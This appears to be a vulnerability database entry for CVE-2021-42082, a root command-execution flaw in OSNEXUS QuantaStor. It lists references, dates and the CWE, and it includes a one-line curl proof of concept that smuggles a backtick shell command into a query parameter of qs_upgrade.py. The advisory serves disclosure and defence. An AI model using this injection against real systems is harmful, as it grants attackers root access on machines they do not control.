Local users are able to execute scripts under root privileges.
POC
On the local host run the following command:
curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;`whoami`'
References
Link | Resource |
---|---|
https://csirt.divd.nl/CVE-2021-42082 | Third Party Advisory |
https://csirt.divd.nl/DIVD-2021-00020/ | |
https://www.osnexus.com/products/software-defined-storage | Product |
https://www.wbsec.nl/osnexus | Third Party Advisory |
https://csirt.divd.nl/CVE-2021-42082 | Third Party Advisory |
https://www.divd.nl/DIVD-2021-00020 | |
https://www.osnexus.com/products/software-defined-storage | Product |
https://www.wbsec.nl/osnexus | Third Party Advisory |
Configurations
History
22 Sep 2025, 07:15
Type | Values Removed | Values Added |
---|---|---|
Summary | (en) Local users are able to execute scripts under root privileges. POC On the local host run the following command: curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;`whoami`' |
Information
Published : 2023-07-10 16:15
Updated : 2025-09-22 07:15
NVD link : CVE-2021-42082
Mitre link : CVE-2021-42082
CVE.ORG link : CVE-2021-42082
JSON object : View
Products Affected
osnexus
- quantastor
CWE
CWE-269
Improper Privilege Management